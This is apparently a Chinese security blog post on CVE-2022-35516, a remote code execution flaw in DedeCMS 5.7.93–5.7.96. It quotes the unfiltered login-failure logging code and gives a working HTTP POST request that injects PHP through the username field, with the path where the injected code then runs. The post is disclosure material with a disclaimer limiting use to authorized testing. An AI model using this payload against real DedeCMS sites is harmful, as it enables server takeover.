DedeCMS v5.7.93 /dede/login.php远程代码执行漏洞CVE-2022-35516
DedeCMS v5.7.93被发现在login.php中包含远程代码执行漏洞。CVE-2022-35516
受影响的产品
Dedecms V5.7.93 – V5.7.96
DedeCMS v5.7.93在文件中增加了登录失败锁定功能,/dede/login.php以符合相关的网络安全规定。
当用户登录失败时,失败消息将被写入文件/data/login.data.php以记录该用户登录失败的次数。
<font face="Calibri">$arr_login[$userid] = "{$count},{$timestamp}";</font><br>
<font face="Calibri">$content = "<?phprn$str_login='" . json_encode($arr_login) . "';";</font><br>
<br>
<font face="Calibri">$fp = fopen($filename, 'w') or die("</font><font face="宋体">写入文件 </font><font face="Calibri">$filename </font><font face="宋体">失败,请检查权限!</font><font face="Calibri">");</font><br>
<font face="Calibri">fwrite($fp, $content);</font><br>
<font face="Calibri">fclose($fp);</font>
漏洞复现
<font face="Calibri">POST /dede/login.php HTTP/1.1<br>
Host: dedecms5793</font><br>
<font face="Calibri">Content-Type: application/x-www-form-urlencoded</font><br>
<font face="Calibri">Cookie: PHPSESSID=e9ag7oevkh77gnko3cdmt7mbc2</font><br>
<br>
<font face="Calibri">dopost=login&userid=%5C%27.phpinfo%28%29%3B%3F%3E&pwd=123&validate=hw0k</font>
文件写入操作没有对写入内容进行充分过滤,使得攻击者可以通过用户名向文件写入恶意代码,导致远程代码执行。
可以直接访问连接进行查看:
域名/data/login.data.php
来源:https://www.linuxlz.com/
0x01 阅读须知
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
THE END
0
二维码
海报
DedeCMS v5.7.93 /dede/login.php远程代码执行漏洞CVE-2022-35516
DedeCMS v5.7.93被发现在login.php中包含远程代码执行漏洞。CVE-2022-35516
受影响的产品
Dedecms V5.7.93 – V5.7.96
DedeCMS v5.7.93在文件中增加了登录失败锁定功能,/dede/login.php以符合相关的网络安全规定。……
共有 0 条评论